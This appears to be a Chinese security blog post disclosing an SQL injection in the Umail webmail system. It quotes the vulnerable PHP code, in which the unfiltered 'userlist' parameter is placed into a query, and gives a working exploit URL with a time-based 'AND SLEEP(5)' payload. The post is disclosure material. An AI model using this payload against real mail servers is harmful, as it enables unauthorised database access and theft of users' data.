Umail最新版SQL注入漏洞

漏洞文件:client\oab\module\operates.php Line: 321 [php] if(ACTION == "save-to-pab") { include_once(LIB_PATH."PAB.php"); $PAB = PAB::getinstance(); $maillist_id = gss($_GET['maillist']); if($maillist_id) { ... } else { $user_ids = gss( $_GET['userlist'] ); //几乎无过滤,过滤空格和判断gpc if ( !$user_ids ) { dump_msg( "param_error", el( "参数错误!", "" ) ); } $where = "t1.UserID IN (".$user_ids.")"; //问题? $arr_tmp = $Mailbox->getMailboxInfo( $domain_id, $where, "", "", "", "", 0 );//跟踪getMailboxInfo $user_all = $arr_tmp['data']; if ( !$user_all ) { dump_json( array( "status" => TRUE, "message" => "" ) ); } foreach ( $user_all as $user ) { $qq = $msn = ""; if ( strpos( $user['qqmsn'], "@" ) ) { $msn = $user['qqmsn']; } else { $qq = $user['qqmsn']; } if ( !$PAB->getContactByMail( $user_id, $user['email'], "contact_id", 0 ) ) { $data = array( "user_id" => $user_id, "fullname" => $user['FullName'], "pref_email" => $user['email'], "pref_tel" => $user['teleextension'] ? $user['teleextension'] : $user['mobil'], "birthday" => $user['birthday'], "im_qq" => $qq, "im_msn" => $msn, "updated" => date( "Y-m-d H:i:s" ) ); $res = $PAB->add_contact( $data, 0 ); if ( !$res ) { dump_json( array( "status" => FALSE, "message" => el( "添加联系人时发生错误,添加失败!", "" ) ) ); } } } } dump_json( array( "status" => TRUE, "message" => "" ) ); } function gss( $_obfuscate_xyiNieq6, $_obfuscate_l9WoIzJ5Xg = FALSE ) { $_obfuscate_xyiNieq6 = trim( $_obfuscate_xyiNieq6 ); if ( !ini_get( "magic_quotes_gpc" ) && $_obfuscate_l9WoIzJ5Xg ) { $_obfuscate_xyiNieq6 = addslashes( $_obfuscate_xyiNieq6 ); } return $_obfuscate_xyiNieq6; } public function getMailboxInfo( $_obfuscate_AkPSczrCIu40, $_obfuscate_IRFhnYw = "", $_obfuscate_AedrEg = "", $_obfuscate_xvYeh9I = "", $_obfuscate_tUi30UB0e88 = "", $_obfuscate_u5srL4rM3PZJLvpPhQ = FALSE, $_obfuscate_ySeUHBw = FALSE ) { $_obfuscate_zbtFQY92OYenSG9u = "t1.DomainID='".$_obfuscate_AkPSczrCIu40."' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0"; if ( $_obfuscate_IRFhnYw ) { $_obfuscate_zbtFQY92OYenSG9u .= " AND ".$_obfuscate_IRFhnYw;//这行就足矣,代入SQL语句了 } .... [/php] exp [php] http://mail.0day5.com/webmail/client/oab/index.php?module=operate&action=save-to-pab&userlist=1 AND SLEEP(5) [/php] SQLMAP截图证明: 7

发表评论